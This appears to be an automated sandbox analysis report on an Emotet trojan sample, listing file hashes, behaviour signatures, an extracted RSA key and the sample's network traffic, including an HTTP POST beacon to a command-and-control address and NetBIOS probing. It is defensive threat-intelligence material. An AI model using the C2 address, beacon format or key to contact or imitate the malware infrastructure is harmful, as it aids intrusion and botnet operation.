Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    18-07-2020 17:13

General

  • Target

    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe

  • Size

    100KB

  • MD5

    b93528d4aa89c747eaae427f944ee337

  • SHA1

    50e3c13684b06fcbc31e1c4f2cda11c2fe773212

  • SHA256

    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d

  • SHA512

    921d4637e0ca86de7ffe3b53c0ab8129d8d29a7fc9811418d44618b8ce69576708fe649267eeb195a8a4c45a75b10b08e2b7cde6c9c79faab1c17f2743aeaf4b

Score
10/10

Malware Config

Extracted

Family

emotet

C2


rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    "C:\Users\Admin\AppData\Local\Temp\a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe"
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    PID:1624

Network

  • flag-unknown
    POST
    http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    Remote address:
    177.144.135.2:80
    Request
    POST /jMxAncA/quN6xOEeXfACGVSp3X5/ HTTP/1.1
    Referer: http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    Content-Type: multipart/form-data; boundary=---------------------------186773967179314
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.135.2
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 18 Jul 2020 17:13:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.135.2:80
    http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/
    http
    a12f7407a7908f5aa24b5aa1dba973a3c4bbaad6d693ddfa089412a06ac7899d.exe
    5.4kB
    580 B
    10
    7

    HTTP Request

    POST http://177.144.135.2/jMxAncA/quN6xOEeXfACGVSp3X5/

    HTTP Response

    200
  • 239.255.255.250:1900
    1.3kB
    8
  • 10.10.0.255:137
    netbios-ns
    1.1kB
    13
  • 10.10.0.40:137
    netbios-ns
    270 B
    3
  • 10.10.0.18:137
    netbios-ns
    270 B
    3
  • 10.10.0.30:137
    netbios-ns
    270 B
    3
  • 10.10.0.41:137
    netbios-ns
    270 B
    3


Downloads

  • memory/1624-0-0x00000000009E0000-0x00000000009EC000-memory.dmp

    Filesize

    48KB
